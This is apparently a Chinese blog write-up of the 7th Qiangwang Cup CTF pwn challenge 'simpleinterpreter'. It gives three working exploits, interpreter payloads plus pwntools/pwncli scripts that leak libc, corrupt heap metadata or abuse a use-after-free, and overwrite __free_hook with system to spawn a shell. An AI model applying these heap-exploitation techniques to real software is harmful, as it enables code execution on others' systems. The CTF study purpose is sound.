第七届强网杯-PWN-【simpleinterpreter】

于 2024-03-21 00:00:37 发布
阅读量928 收藏 9
点赞数 24
分类专栏: 强网杯 PWN 文章标签: 数据库 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/135277978
版权

对于一个刚入门的三个月的菜鸡pwn手打算按照难度慢慢复现qwb的题目

先simpleinterpreter吧
在这里插入图片描述

simpleinterpreter libc 2.27

逆向

解释器相关用到的陌生函数

法1

方法1参考链接
程序实现了一个 C 语言解释器,可用的关键字如下:

char else enum if int return sizeof while read close printf malloc free memset memcmp exit void main

 read close printf malloc free memset memcmp exit 和原生C 函数效果一样
 可以尝试一下&*操作是否存在,存在利用那么更方便

漏洞就是越界,首先用 malloc 一个超大堆块分配到 mmap 内存,然后越界写 libc,将 free_hook 覆盖为 system 地址,然后释放”/bin/sh”即可 getshell(libc 版本是 2.27)

本地好像不行,得到的地址由mmap的第几次得到没有确定下来,导致与基地址偏移无法确定,但是第几次mmap的范围有限,所以如果不断尝试可能成功

该法对应的输入代码如下

main(){
int size;
char* freehook;
char* system; 
char* v;
char *binsh;
size = 204800;
binsh="/bin/sh";
v=malloc(size);
freehook=v-0xb2728;
system=v-0x450bf0;
*(int*)freehook=system;
free(binsh);
}

法二

方法二参考链接

该方法没有使用到*和&,单纯利用提供得关键字解决

  1. 分配一个大于fastbin的chunk和两个fastbin的chunk
  2. free第一个chunk,此时进入unsortedbin泄露libc地址
  3. free第二个和第三个chunk,然后修改第三个chunk的fd为free_hook-8的位置
  4. malloc两次
  5. 修改第二次的chunk的值为/bin/sh\x00和system地址,此时free_hook的内容被修改为system地址
  6. free第二次的chunk即可getshell
from pwn import *
sh = process('./simpleinterpreter')
context.log_level = "debug"
code = '''
int main()
{
    void* p1;
    void* p2;
    void* p3;
    void* p4;
    void* p5;
    p1 = malloc(0x500);
    p2 = malloc(0x18);
    p3 = malloc(0x18);
    free(p1);
    printf(p1);
    free(p3);
    free(p2);
    read(0, p2, 8);
    p4 = malloc(0x18);
    p5 = malloc(0x18);
    read(0, p5, 0x10);
    free(p5);
    return 0;
}'''

sh.sendlineafter("Code size:", str(len(code)))
sh.sendafter("Please give me the code to interpret:", code)
libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3ebca0
log.success("libc_base:\t" + hex(libc_base))
free_hook = libc_base + 0x3ed8e8
system = libc_base + 0x4f420
sh.send(p64(free_hook - 8))
sh.send("/bin/sh\x00" + p64(system))
sh.interactive()

法3

参考链接

与法1的区别在于泄露libc基地址方式不同而已
攻击思路先使用malloc申请一个大堆块,再malloc申请一个小堆块防止大堆块释放与TOPchunk合并,利用指针UAF读取free后残留的main_arena计算libc地址,最后利用指针改写__free_hook为system执行free即可getshell


from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

# one_gadgets: list = get_current_one_gadget_from_libc(more=False)
# CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)

payload = '''
int c;
int main(){
    int b;
    int libc;
    int* free_hook;
    char* sh;
    libc =  0 ;
    free_hook = libc + 1;
    free_hook = malloc(0x500);
    sh = malloc(0x10);
    free(free_hook);
    libc = *free_hook - 0x3ebca0;
    printf("%lx",libc);
    free_hook = libc + 0x3ed8e8;
    *free_hook = libc + 0x4F420;
    sh[0] = 's';
    sh[1] = 'h';
    free(sh);
    return 0;
}
'''
sla('size:',str(len(payload)))
sla('et:',payload)
ia()
看星猩的柴狗
关注
专栏目录
第七届强网杯-PWN-【warmup】
llovewuzhengzi的博客
03-08 1168
如何布置参考使得第一个chunk布置相关rop,第二个chunk布置相关IO_FILE_plus_struct的伪造结构体,然后根据house of apple2来布置,并最后orw。
2019广东省强网杯PWN-1
SkYe's Blog
09-24 745
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
强网杯2021 pwn 赛题解析——baby_diary
CoLin的pwn小屋
07-25 525
强网杯2021 pwn 赛题回顾
强网杯部分pwn题writeup
Sakura给爷pwn全场
10-01 577
强网杯部分pwn题writeup: https://www.anquanke.com/post/id/215274#h3-2
强网杯2018 pwn复现
weixin_30588729的博客
08-03 431
前言 本文对强网杯 中除了 2 个内核题以外的 6 个 pwn 题的利用方式进行记录。题目真心不错 程序和 exp: https://gitee.com/hac425/blog_data/blob/master/qwb2018/ 正文 silent 漏洞 在 free 的时候指针没有清空,而且程序没有 检测指针是否已经被释放 double free, 后面的 编辑功能也没有检验指针是否已经被 fr...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2018年强网杯pwn题复现
qq_46441427的博客
08-31 235
silent 漏洞位置: free后没有给指针置空,edit也没有检查chunk是否free 利用思路: 利用uaf把chunk进入fastbin中,构造三个单链表来写free_hook然后getshell
2023年第七届强网杯初赛 WP
最新发布
渗透测试研究中心
12-22 3221
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 2026
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
强网杯2020线上赛部分wp
qq_36495104的博客
08-30 884
WEB Funhash 参考 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4 exp hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop Web辅助 这题是学弟做出来的@Sn0w33 1.php反序列化时,S会把binary string当做字符 2.__wakeup()当属性个数大于实际属性个数时会跳过__wakeup() 3.字符串逃逸 五个字符\
i春秋网鼎杯网络安全大赛clip题目writeup
热门推荐
iqiqiya的博客
08-21 1万+
题目信息: 下载下来是一个压缩包   解压之后可以得到两个文件 下载链接: https://pan.baidu.com/s/1k4UXTq8hYpwGLVzNa9lVEg 密码: 9was   先查看desc.txt的内容并翻译 可以看出damaged.disk是一个磁盘文件 那么里边肯定有东西! 尝试将其放进kali linux用binwalk分析  foremost提取都...
2022强网杯pwn部分wp
N1rvana的博客
08-02 1550
2022强网杯pwn
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1316
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2018网鼎杯逆向 Beijing(write up)
re_psyche的博客
08-22 3153
题目链接:https://pan.baidu.com/s/17rkPKnRATe8zKP1yonm8Xw 密码:3dwa 首先拖进IDA,函数不多,毕竟只是3KB的文件,先看主函数。 F5查看一下伪代码 v0到v14全部都是输出,所以我们点击任意一个sub_xxxxxxx函数看一下。 再进一下byte_xxxxx. 看到这里·,形式就已经很明朗了,我们根据顺序一一对应...
2018强网杯记录
飞花的世界
03-29 4871
 1 签到题 2welcome下载文件,发现是一个BMP图片文件。于是使用Stegsolve工具分离,发现,得到flag 3 streamgame1上脚本1#! /usr/bin/env python3# coding:utf8def lfsr(R,mask):    output = (R << 1) & 0xffffff    i=(R&mask)&0xff...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值